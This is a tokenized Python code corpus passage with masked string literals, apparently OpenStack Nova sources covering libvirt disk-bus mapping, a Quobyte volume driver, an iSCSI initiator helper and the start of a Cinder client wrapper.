"<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return None <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> else : <EOL> raise exception . NovaException ( <EOL> _ ( "<STR_LIT>" ) % <EOL> disk_bus ) <EOL> def get_dev_count_for_disk_bus ( disk_bus ) : <EOL> """<STR_LIT>""" <EOL> if disk_bus == "<STR_LIT>" : <EOL> return <NUM_LIT:4> <EOL> else : <EOL> return <NUM_LIT> <EOL> def find_disk_dev_for_disk_bus ( mapping , bus , <EOL> last_device = False , <EOL> assigned_devices = None ) : <EOL> """<STR_LIT>""" <EOL> dev_prefix = get_dev_prefix_for_disk_bus ( bus ) <EOL> if dev_prefix is None : <EOL> return None <EOL> if assigned_devices is None : <EOL> assigned_devices = [ ] <EOL> max_dev = get_dev_count_for_disk_bus ( bus ) <EOL> if last_device : <EOL> devs = [ max_dev - <NUM_LIT:1> ] <EOL> else : <EOL> devs = range ( max_dev ) <EOL> for idx in devs : <EOL> disk_dev = dev_prefix + chr ( ord ( '<STR_LIT:a>' ) + idx ) <EOL> if not has_disk_dev ( mapping , disk_dev ) : <EOL> if disk_dev not in assigned_devices : <EOL> return disk_dev <EOL> raise exception . NovaException ( <EOL> _ ( "<STR_LIT>" ) % <EOL> dev_prefix ) <EOL> def is_disk_bus_valid_for_virt ( virt_type , disk_bus ) : <EOL> valid_bus = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> if virt_type not in valid_bus : <EOL> raise exception . UnsupportedVirtType ( virt = virt_type ) <EOL> return disk_bus in valid_bus [ virt_type ] <EOL> def get_disk_bus_for_device_type ( instance , <EOL> virt_type , <EOL> image_meta , <EOL> device_type = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> if device_type == "<STR_LIT>" : <EOL> disk_bus = osinfo . HardwareProperties ( image_meta ) . disk_model <EOL> else : <EOL> key = "<STR_LIT>" + device_type + "<STR_LIT>" <EOL> disk_bus = image_meta . properties . get ( key ) <EOL> if disk_bus is not None : <EOL> if not is_disk_bus_valid_for_virt ( virt_type , disk_bus ) : <EOL> raise exception . UnsupportedHardware ( model = disk_bus , <EOL> virt = virt_type ) <EOL> return disk_bus <EOL> if virt_type == "<STR_LIT>" : <EOL> if device_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif virt_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif virt_type == "<STR_LIT>" : <EOL> guest_vm_mode = vm_mode . get_from_instance ( instance ) <EOL> if guest_vm_mode == vm_mode . HVM : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> elif virt_type in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> if device_type == "<STR_LIT>" : <EOL> guestarch = libvirt_utils . get_arch ( image_meta ) <EOL> if guestarch in ( arch . PPC , arch . PPC64 , arch . PPCLE , arch . PPC64LE , <EOL> arch . S390 , arch . S390X ) : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> elif device_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif device_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif virt_type == "<STR_LIT>" : <EOL> if device_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif device_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> else : <EOL> raise exception . UnsupportedVirtType ( virt = virt_type ) <EOL> return None <EOL> def get_disk_bus_for_disk_dev ( virt_type , disk_dev ) : <EOL> """<STR_LIT>""" <EOL> if disk_dev . startswith ( '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> elif disk_dev . startswith ( '<STR_LIT>' ) : <EOL> if virt_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif virt_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> elif disk_dev . startswith ( '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> elif disk_dev . startswith ( '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> elif disk_dev . startswith ( '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> elif disk_dev . startswith ( '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> else : <EOL> raise exception . NovaException ( <EOL> _ ( "<STR_LIT>" ) % <EOL> disk_dev [ : <NUM_LIT:1> ] ) <EOL> def get_next_disk_info ( mapping , disk_bus , <EOL> device_type = '<STR_LIT>' , <EOL> last_device = False , <EOL> boot_index = None , <EOL> assigned_devices = None ) : <EOL> """<STR_LIT>""" <EOL> disk_dev = find_disk_dev_for_disk_bus ( mapping , <EOL> disk_bus , <EOL> last_device , <EOL> assigned_devices ) <EOL> info = { '<STR_LIT>' : disk_bus , <EOL> '<STR_LIT>' : disk_dev , <EOL> '<STR_LIT:type>' : device_type } <EOL> if boot_index is not None and boot_index >= <NUM_LIT:0> : <EOL> info [ '<STR_LIT>' ] = str ( boot_index ) <EOL> return info <EOL> def get_eph_disk ( index ) : <EOL> return '<STR_LIT>' + str ( index ) <EOL> def get_config_drive_type ( ) : <EOL> """<STR_LIT>""" <EOL> if CONF . config_drive_format == '<STR_LIT>' : <EOL> config_drive_type = '<STR_LIT>' <EOL> elif CONF . config_drive_format == '<STR_LIT>' : <EOL> config_drive_type = '<STR_LIT>' <EOL> else : <EOL> raise exception . ConfigDriveUnknownFormat ( <EOL> format = CONF . config_drive_format ) <EOL> return config_drive_type <EOL> def get_info_from_bdm ( instance , virt_type , image_meta , bdm , <EOL> mapping = None , disk_bus = None , <EOL> dev_type = None , allowed_types = None , <EOL> assigned_devices = None ) : <EOL> mapping = mapping or { } <EOL> allowed_types = allowed_types or SUPPORTED_DEVICE_TYPES <EOL> device_name = block_device . strip_dev ( get_device_name ( bdm ) ) <EOL> bdm_type = bdm . get ( '<STR_LIT>' ) or dev_type <EOL> if bdm_type not in allowed_types : <EOL> bdm_type = '<STR_LIT>' <EOL> bdm_bus = bdm . get ( '<STR_LIT>' ) or disk_bus <EOL> if not is_disk_bus_valid_for_virt ( virt_type , bdm_bus ) : <EOL> if device_name : <EOL> bdm_bus = get_disk_bus_for_disk_dev ( virt_type , device_name ) <EOL> else : <EOL> bdm_bus = get_disk_bus_for_device_type ( instance , virt_type , <EOL> image_meta , bdm_type ) <EOL> if not device_name : <EOL> if assigned_devices : <EOL> padded_mapping = { dev : { '<STR_LIT>' : dev } for dev in assigned_devices } <EOL> padded_mapping . update ( mapping ) <EOL> else : <EOL> padded_mapping = mapping <EOL> device_name = find_disk_dev_for_disk_bus ( padded_mapping , bdm_bus ) <EOL> bdm_info = { '<STR_LIT>' : bdm_bus , <EOL> '<STR_LIT>' : device_name , <EOL> '<STR_LIT:type>' : bdm_type } <EOL> bdm_format = bdm . get ( '<STR_LIT>' ) <EOL> if bdm_format : <EOL> bdm_info . update ( { '<STR_LIT>' : bdm_format } ) <EOL> boot_index = bdm . get ( '<STR_LIT>' ) <EOL> if boot_index is not None and boot_index >= <NUM_LIT:0> : <EOL> bdm_info [ '<STR_LIT>' ] = str ( boot_index + <NUM_LIT:1> ) <EOL> return bdm_info <EOL> def get_device_name ( bdm ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( bdm , obj_base . NovaObject ) : <EOL> return bdm . device_name <EOL> else : <EOL> return bdm . get ( '<STR_LIT>' ) or bdm . get ( '<STR_LIT>' ) <EOL> def get_root_info ( instance , virt_type , image_meta , root_bdm , <EOL> disk_bus , cdrom_bus , root_device_name = None ) : <EOL> no_root_bdm = ( not root_bdm or ( <EOL> root_bdm . get ( '<STR_LIT>' ) == '<STR_LIT:image>' and <EOL> root_bdm . get ( '<STR_LIT>' ) == '<STR_LIT>' ) ) <EOL> if no_root_bdm : <EOL> if ( image_meta . obj_attr_is_set ( '<STR_LIT>' ) and <EOL> image_meta . disk_format == '<STR_LIT>' ) : <EOL> root_device_bus = cdrom_bus <EOL> root_device_type = '<STR_LIT>' <EOL> else : <EOL> root_device_bus = disk_bus <EOL> root_device_type = '<STR_LIT>' <EOL> if root_device_name : <EOL> root_device_bus = get_disk_bus_for_disk_dev ( virt_type , <EOL> root_device_name ) <EOL> else : <EOL> root_device_name = find_disk_dev_for_disk_bus ( { } , root_device_bus ) <EOL> return { '<STR_LIT>' : root_device_bus , <EOL> '<STR_LIT:type>' : root_device_type , <EOL> '<STR_LIT>' : block_device . strip_dev ( root_device_name ) , <EOL> '<STR_LIT>' : '<STR_LIT:1>' } <EOL> if not get_device_name ( root_bdm ) and root_device_name : <EOL> root_bdm = root_bdm . copy ( ) <EOL> root_bdm [ '<STR_LIT>' ] = root_device_name <EOL> return get_info_from_bdm ( instance , virt_type , image_meta , <EOL> root_bdm , { } , disk_bus ) <EOL> def default_device_names ( virt_type , context , instance , block_device_info , <EOL> image_meta ) : <EOL> get_disk_info ( virt_type , instance , image_meta , block_device_info ) <EOL> for driver_bdm in itertools . chain ( block_device_info [ '<STR_LIT>' ] , <EOL> [ block_device_info [ '<STR_LIT>' ] ] if <EOL> block_device_info [ '<STR_LIT>' ] else [ ] , <EOL> block_device_info [ '<STR_LIT>' ] ) : <EOL> driver_bdm . save ( ) <EOL> def has_default_ephemeral ( instance , disk_bus , block_device_info , mapping ) : <EOL> ephemerals = driver . block_device_info_get_ephemerals ( block_device_info ) <EOL> if instance . ephemeral_gb <= <NUM_LIT:0> or ephemerals : <EOL> return None <EOL> else : <EOL> info = get_next_disk_info ( mapping , disk_bus ) <EOL> if block_device . volume_in_mapping ( info [ '<STR_LIT>' ] , block_device_info ) : <EOL> return None <EOL> return info <EOL> def update_bdm ( bdm , info ) : <EOL> device_name_field = ( '<STR_LIT>' <EOL> if '<STR_LIT>' in bdm <EOL> else '<STR_LIT>' ) <EOL> bdm . update ( dict ( zip ( ( device_name_field , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( ( bdm . get ( device_name_field ) or <EOL> block_device . prepend_dev ( info [ '<STR_LIT>' ] ) ) , <EOL> info [ '<STR_LIT>' ] , info [ '<STR_LIT:type>' ] ) ) ) ) <EOL> def get_disk_mapping ( virt_type , instance , <EOL> disk_bus , cdrom_bus , <EOL> image_meta , <EOL> block_device_info = None , <EOL> rescue = False ) : <EOL> """<STR_LIT>""" <EOL> mapping = { } <EOL> if rescue : <EOL> rescue_info = get_next_disk_info ( mapping , <EOL> disk_bus , boot_index = <NUM_LIT:1> ) <EOL> mapping [ '<STR_LIT>' ] = rescue_info <EOL> mapping [ '<STR_LIT:root>' ] = rescue_info <EOL> os_info = get_next_disk_info ( mapping , <EOL> disk_bus ) <EOL> mapping [ '<STR_LIT>' ] = os_info <EOL> return mapping <EOL> pre_assigned_device_names = [ block_device . strip_dev ( get_device_name ( bdm ) ) for bdm in itertools . chain ( <EOL> driver . block_device_info_get_ephemerals ( block_device_info ) , <EOL> [ driver . block_device_info_get_swap ( block_device_info ) ] , <EOL> driver . block_device_info_get_mapping ( block_device_info ) ) <EOL> if get_device_name ( bdm ) ] <EOL> root_bdm = block_device . get_root_bdm ( <EOL> driver . block_device_info_get_mapping ( block_device_info ) ) <EOL> root_device_name = block_device . strip_dev ( <EOL> driver . block_device_info_get_root ( block_device_info ) ) <EOL> root_info = get_root_info ( <EOL> instance , virt_type , image_meta , root_bdm , <EOL> disk_bus , cdrom_bus , root_device_name ) <EOL> mapping [ '<STR_LIT:root>' ] = root_info <EOL> if not root_bdm and not block_device . volume_in_mapping ( root_info [ '<STR_LIT>' ] , <EOL> block_device_info ) : <EOL> mapping [ '<STR_LIT>' ] = root_info <EOL> elif root_bdm : <EOL> update_bdm ( root_bdm , root_info ) <EOL> default_eph = has_default_ephemeral ( instance , disk_bus , block_device_info , <EOL> mapping ) <EOL> if default_eph : <EOL> mapping [ '<STR_LIT>' ] = default_eph <EOL> for idx , eph in enumerate ( driver . block_device_info_get_ephemerals ( <EOL> block_device_info ) ) : <EOL> eph_info = get_info_from_bdm ( <EOL> instance , virt_type , image_meta , eph , mapping , disk_bus , <EOL> assigned_devices = pre_assigned_device_names ) <EOL> mapping [ get_eph_disk ( idx ) ] = eph_info <EOL> update_bdm ( eph , eph_info ) <EOL> swap = driver . block_device_info_get_swap ( block_device_info ) <EOL> if swap and swap . get ( '<STR_LIT>' , <NUM_LIT:0> ) > <NUM_LIT:0> : <EOL> swap_info = get_info_from_bdm ( <EOL> instance , virt_type , image_meta , <EOL> swap , mapping , disk_bus ) <EOL> mapping [ '<STR_LIT>' ] = swap_info <EOL> update_bdm ( swap , swap_info ) <EOL> elif instance . get_flavor ( ) [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> swap_info = get_next_disk_info ( mapping , disk_bus , <EOL> assigned_devices = pre_assigned_device_names ) <EOL> if not block_device . volume_in_mapping ( swap_info [ '<STR_LIT>' ] , <EOL> block_device_info ) : <EOL> mapping [ '<STR_LIT>' ] = swap_info <EOL> block_device_mapping = driver . block_device_info_get_mapping ( <EOL> block_device_info ) <EOL> for bdm in block_device_mapping : <EOL> vol_info = get_info_from_bdm ( <EOL> instance , virt_type , image_meta , bdm , mapping , <EOL> assigned_devices = pre_assigned_device_names ) <EOL> mapping [ block_device . prepend_dev ( vol_info [ '<STR_LIT>' ] ) ] = vol_info <EOL> update_bdm ( bdm , vol_info ) <EOL> if configdrive . required_by ( instance ) : <EOL> device_type = get_config_drive_type ( ) <EOL> disk_bus = get_disk_bus_for_device_type ( instance , <EOL> virt_type , <EOL> image_meta , <EOL> device_type ) <EOL> config_info = get_next_disk_info ( mapping , <EOL> disk_bus , <EOL> device_type , <EOL> last_device = True ) <EOL> mapping [ '<STR_LIT>' ] = config_info <EOL> return mapping <EOL> def get_disk_info ( virt_type , instance , image_meta , <EOL> block_device_info = None , rescue = False ) : <EOL> """<STR_LIT>""" <EOL> disk_bus = get_disk_bus_for_device_type ( instance , virt_type , <EOL> image_meta , "<STR_LIT>" ) <EOL> cdrom_bus = get_disk_bus_for_device_type ( instance , virt_type , <EOL> image_meta , "<STR_LIT>" ) <EOL> mapping = get_disk_mapping ( virt_type , instance , <EOL> disk_bus , cdrom_bus , <EOL> image_meta , <EOL> block_device_info , <EOL> rescue ) <EOL> return { '<STR_LIT>' : disk_bus , <EOL> '<STR_LIT>' : cdrom_bus , <EOL> '<STR_LIT>' : mapping } <EOL> def get_boot_order ( disk_info ) : <EOL> boot_mapping = ( info for name , info in six . iteritems ( disk_info [ '<STR_LIT>' ] ) <EOL> if name != '<STR_LIT:root>' and info . get ( '<STR_LIT>' ) is not None ) <EOL> boot_devs_dup = ( BOOT_DEV_FOR_TYPE [ dev [ '<STR_LIT:type>' ] ] for dev in <EOL> sorted ( boot_mapping , <EOL> key = operator . itemgetter ( '<STR_LIT>' ) ) ) <EOL> def uniq ( lst ) : <EOL> s = set ( ) <EOL> return [ el for el in lst if el not in s and not s . add ( el ) ] <EOL> return uniq ( boot_devs_dup ) </s>
<s> import errno <EOL> import os <EOL> from oslo_concurrency import processutils <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_utils import fileutils <EOL> import six <EOL> from nova import exception as nova_exception <EOL> from nova . i18n import _ <EOL> from nova . i18n import _LE <EOL> from nova . i18n import _LI <EOL> from nova import paths <EOL> from nova import utils <EOL> from nova . virt . libvirt import utils as libvirt_utils <EOL> from nova . virt . libvirt . volume import fs <EOL> LOG = logging . getLogger ( __name__ ) <EOL> volume_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = paths . state_path_def ( '<STR_LIT>' ) , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CONF . register_opts ( volume_opts , '<STR_LIT>' ) <EOL> SOURCE_PROTOCOL = '<STR_LIT>' <EOL> SOURCE_TYPE = '<STR_LIT:file>' <EOL> DRIVER_CACHE = '<STR_LIT:none>' <EOL> DRIVER_IO = '<STR_LIT>' <EOL> def mount_volume ( volume , mnt_base , configfile = None ) : <EOL> """<STR_LIT>""" <EOL> fileutils . ensure_tree ( mnt_base ) <EOL> command = [ '<STR_LIT>' , volume , mnt_base ] <EOL> if configfile : <EOL> command . extend ( [ '<STR_LIT:-c>' , configfile ] ) <EOL> LOG . debug ( '<STR_LIT>' , <EOL> volume , <EOL> mnt_base ) <EOL> utils . execute ( * command , check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:4> ] ) <EOL> LOG . info ( _LI ( '<STR_LIT>' ) , volume ) <EOL> def umount_volume ( mnt_base ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> utils . execute ( '<STR_LIT>' , mnt_base ) <EOL> except processutils . ProcessExecutionError as exc : <EOL> if '<STR_LIT>' in six . text_type ( exc ) : <EOL> LOG . error ( _LE ( "<STR_LIT>" ) , <EOL> mnt_base ) <EOL> else : <EOL> LOG . exception ( _LE ( "<STR_LIT>" ) , <EOL> mnt_base ) <EOL> def validate_volume ( mnt_base ) : <EOL> """<STR_LIT>""" <EOL> command = [ '<STR_LIT>' , "<STR_LIT>" , "<STR_LIT>" , mnt_base ] <EOL> try : <EOL> utils . execute ( * command ) <EOL> except processutils . ProcessExecutionError as exc : <EOL> msg = ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> % { '<STR_LIT>' : mnt_base , '<STR_LIT>' : exc } ) <EOL> raise nova_exception . NovaException ( msg ) <EOL> if not os . access ( mnt_base , os . W_OK | os . X_OK ) : <EOL> msg = ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % mnt_base ) <EOL> raise nova_exception . NovaException ( msg ) <EOL> class LibvirtQuobyteVolumeDriver ( fs . LibvirtBaseFileSystemVolumeDriver ) : <EOL> """<STR_LIT>""" <EOL> def _get_mount_point_base ( self ) : <EOL> return CONF . libvirt . quobyte_mount_point_base <EOL> def get_config ( self , connection_info , disk_info ) : <EOL> conf = super ( LibvirtQuobyteVolumeDriver , <EOL> self ) . get_config ( connection_info , disk_info ) <EOL> data = connection_info [ '<STR_LIT:data>' ] <EOL> conf . source_protocol = SOURCE_PROTOCOL <EOL> conf . source_type = SOURCE_TYPE <EOL> conf . driver_cache = DRIVER_CACHE <EOL> conf . driver_io = DRIVER_IO <EOL> conf . driver_format = data . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> conf . source_path = self . _get_device_path ( connection_info ) <EOL> return conf <EOL> @ utils . synchronized ( '<STR_LIT>' ) <EOL> def connect_volume ( self , connection_info , disk_info ) : <EOL> """<STR_LIT>""" <EOL> data = connection_info [ '<STR_LIT:data>' ] <EOL> quobyte_volume = self . _normalize_export ( data [ '<STR_LIT>' ] ) <EOL> mount_path = self . _get_mount_path ( connection_info ) <EOL> mounted = libvirt_utils . is_mounted ( mount_path , <EOL> SOURCE_PROTOCOL <EOL> + '<STR_LIT:@>' + quobyte_volume ) <EOL> if mounted : <EOL> try : <EOL> os . stat ( mount_path ) <EOL> except OSError as exc : <EOL> if exc . errno == errno . ENOTCONN : <EOL> mounted = False <EOL> LOG . info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , mount_path ) <EOL> umount_volume ( mount_path ) <EOL> if not mounted : <EOL> mount_volume ( quobyte_volume , <EOL> mount_path , <EOL> CONF . libvirt . quobyte_client_cfg ) <EOL> validate_volume ( mount_path ) <EOL> @ utils . synchronized ( '<STR_LIT>' ) <EOL> def disconnect_volume ( self , connection_info , disk_dev ) : <EOL> """<STR_LIT>""" <EOL> quobyte_volume = self . _normalize_export ( <EOL> connection_info [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] ) <EOL> mount_path = self . _get_mount_path ( connection_info ) <EOL> if libvirt_utils . is_mounted ( mount_path , '<STR_LIT>' + quobyte_volume ) : <EOL> umount_volume ( mount_path ) <EOL> else : <EOL> LOG . info ( _LI ( "<STR_LIT>" ) , <EOL> mount_path ) <EOL> def _normalize_export ( self , export ) : <EOL> protocol = SOURCE_PROTOCOL + "<STR_LIT>" <EOL> if export . startswith ( protocol ) : <EOL> export = export [ len ( protocol ) : ] <EOL> return export </s>
<s> """<STR_LIT>""" <EOL> from os_brick . initiator import connector <EOL> from oslo_concurrency import processutils as putils <EOL> from nova import utils <EOL> def get_iscsi_initiator ( execute = None ) : <EOL> """<STR_LIT>""" <EOL> root_helper = utils . get_root_helper ( ) <EOL> if not execute : <EOL> execute = putils . execute <EOL> iscsi = connector . ISCSIConnector ( root_helper = root_helper , <EOL> execute = execute ) <EOL> return iscsi . get_initiator ( ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import copy <EOL> import functools <EOL> import sys <EOL> from cinderclient import client as cinder_client <EOL> from cinderclient import exceptions as cinder_exception <EOL> from cinderclient . v1 import client as v1_client <EOL> from keystoneauth1 import exceptions as keystone_exception <EOL> from keystoneauth1 import loading as ks_loading <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_utils import excutils <EOL> from oslo_utils import strutils <EOL> import six <EOL> from nova import availability_zones as az <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova . i18n import _LE <EOL> from nova . i18n import _LW <EOL> cinder_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . IntOpt ( '<STR_LIT>' , <EOL> default = <NUM_LIT:3> , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = True , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CINDER_OPT_GROUP = '<STR_LIT>' <EOL> CONF . register_opts ( cinder_opts , group = CINDER_OPT_GROUP ) <EOL> deprecated = { '<STR_LIT>' : [ cfg . DeprecatedOpt ( '<STR_LIT>' , <EOL> group = CINDER_OPT_GROUP ) ] , <EOL> '<STR_LIT>' : [ cfg . DeprecatedOpt ( '<STR_LIT>' , <EOL> group = CINDER_OPT_GROUP ) ] , <EOL> '<STR_LIT>' : [ cfg . DeprecatedOpt ( '<STR_LIT>' , <EOL> group = CINDER_OPT_GROUP ) ] } <EOL> ks_loading . register_session_conf_options ( CONF , <EOL> CINDER_OPT_GROUP , <EOL> deprecated_opts = deprecated ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> _SESSION = None <EOL> _V1_ERROR_RAISED = False <EOL> def reset_globals ( ) : <EOL> """<STR_LIT>""" <EOL> global _SESSION <EOL> _SESSION = None <EOL> def cinderclient ( context ) : <EOL> global _SESSION <EOL> global _V1_ERROR_RAISED <EOL> if not _SESSION : <EOL> _SESSION = ks_loading . load_session_from_conf_options ( CONF , <EOL> CINDER_OPT_GROUP ) <EOL> url = None <EOL> endpoint_override = None <EOL> auth = context . get_auth_plugin ( ) <EOL> service_type , service_name , interface = CONF . cinder . catalog_info . split ( '<STR_LIT::>' ) <EOL> service_parameters = { '<STR_LIT>' : service_type , <EOL> '<STR_LIT>' : service_name , <EOL> '<STR_LIT>' : interface , <EOL> '<STR_LIT>' : CONF . cinder . os_region_name } <EOL> if CONF . cinder . endpoint_template : <EOL> url = CONF . cinder . endpoint_template % context . to_dict ( ) <EOL> endpoint_override = url <EOL> else : <EOL> url = _SESSION . get_endpoint ( auth , ** service_parameters ) <EOL> version = cinder_client . get_volume_api_from_url ( url ) <EOL> if version == '<STR_LIT:1>' and not _V1_ERROR_RAISED : <EOL> msg = _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> LOG . warning ( msg ) <EOL> _V1_ERROR_RAISED = True <EOL> return cinder_client . Client ( version , <EOL> session = _SESSION , <EOL> auth = auth , <EOL> endpoint_override = endpoint_override , <EOL> connect_retries = CONF . cinder . http_retries , <EOL> ** service_parameters ) <EOL> def _untranslate_volume_summary_view ( context , vol ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> d [ '<STR_LIT:id>' ] = vol . id <EOL> d [ '<STR_LIT:status>' ] = vol . status <EOL> d [ '<STR_LIT:size>' ] = vol . size <EOL> d [ '<STR_LIT>' ] = vol . availability_zone <EOL> d [ '<STR_LIT>' ] = vol . created_at <EOL> d [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> d [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> d [ '<STR_LIT>' ] = getattr ( vol , '<STR_LIT>' , False ) <EOL> if vol . attachments : <EOL> d [ '<STR_LIT>' ] = collections . OrderedDict ( ) <EOL> for attachment in vol . attachments : <EOL> a = { attachment [ '<STR_LIT>' ] : <EOL> { '<STR_LIT>' : attachment . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : attachment . get ( '<STR_LIT>' ) } <EOL> } <EOL> d [ '<STR_LIT>' ] . update ( a . items ( ) ) <EOL> d [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> d [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if hasattr ( vol , '<STR_LIT>' ) : <EOL> d [ '<STR_LIT>' ] = vol . display_name <EOL> d [ '<STR_LIT>' ] = vol . display_description <EOL> else : <EOL> d [ '<STR_LIT>' ] = vol . name <EOL> d [ '<STR_LIT>' ] = vol . description <EOL> d [ '<STR_LIT>' ] = vol . volume_type <EOL> d [ '<STR_LIT>' ] = vol . snapshot_id <EOL> d [ '<STR_LIT>' ] = strutils . bool_from_string ( vol . bootable ) <EOL> d [ '<STR_LIT>' ] = { } <EOL> for key , value in vol . metadata . items ( ) : <EOL> d [ '<STR_LIT>' ] [ key ] = value <EOL> if hasattr ( vol , '<STR_LIT>' ) : <EOL> d [ '<STR_LIT>' ] = copy . deepcopy ( vol . volume_image_metadata ) <EOL> return d <EOL> def _untranslate_snapshot_summary_view ( context , snapshot ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> d [ '<STR_LIT:id>' ] = snapshot . id <EOL> d [ '<STR_LIT:status>' ] = snapshot . status <EOL> d [ '<STR_LIT>' ] = snapshot . progress <EOL> d [ '<STR_LIT:size>' ] = snapshot . size <EOL> d [ '<STR_LIT>' ] = snapshot . created_at <EOL> if hasattr ( snapshot , '<STR_LIT>' ) : <EOL> d [ '<STR_LIT>' ] = snapshot . display_name <EOL> d [ '<STR_LIT>' ] = snapshot . display_description <EOL> else : <EOL> d [ '<STR_LIT>' ] = snapshot . name <EOL> d [ '<STR_LIT>' ] = snapshot . description <EOL> d [ '<STR_LIT>' ] = snapshot . volume_id <EOL> d [ '<STR_LIT>' ] = snapshot . project_id <EOL> d [ '<STR_LIT>' ] = snapshot . size <EOL> return d <EOL> def translate_cinder_exception ( method ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( method ) <EOL> def wrapper ( self , ctx , * args , ** kwargs ) : <EOL> try : <EOL> res = method ( self , ctx , * args , ** kwargs ) <EOL> except ( cinder_exception . ConnectionError , <EOL> keystone_exception . ConnectionError ) : <EOL> exc_type , exc_value , exc_trace = sys . exc_info ( ) <EOL> exc_value = exception . CinderConnectionFailed ( <EOL> reason = six . text_type ( exc_value ) ) <EOL> six . reraise ( exc_value , None , exc_trace ) <EOL> except ( keystone_exception . BadRequest , <EOL> cinder_exception . BadRequest ) : <EOL> exc_type , exc_value , exc_trace = sys . exc_info ( ) <EOL> exc_value = exception . InvalidInput ( <EOL> reason = six . text_type ( exc_value ) ) <EOL> six . reraise ( exc_value , None , exc_trace ) <EOL> except ( keystone_exception . Forbidden , <EOL> cinder_exception . Forbidden ) : <EOL> exc_type , exc_value , exc_trace = sys . exc_info ( ) <EOL> exc_value = exception . Forbidden ( message = six . text_type ( exc_value ) ) <EOL> six . reraise ( exc_value , None , exc_trace ) <EOL> return res <EOL> return wrapper <EOL> def translate_volume_exception ( method ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( self , ctx , volume_id , * args , ** kwargs ) : <EOL> try : <EOL> res = method ( self , ctx , volume_id , * args , ** kwargs ) <EOL> except ( cinder_exception . ClientException , <EOL> keystone_exception . ClientException ) : <EOL> exc_type , exc_value , exc_trace = sys . exc_info ( ) <EOL> if isinstance ( exc_value , ( keystone_exception . NotFound , <EOL> cinder_exception . NotFound ) ) : <EOL> exc_value = exception . VolumeNotFound ( volume_id = volume_id ) 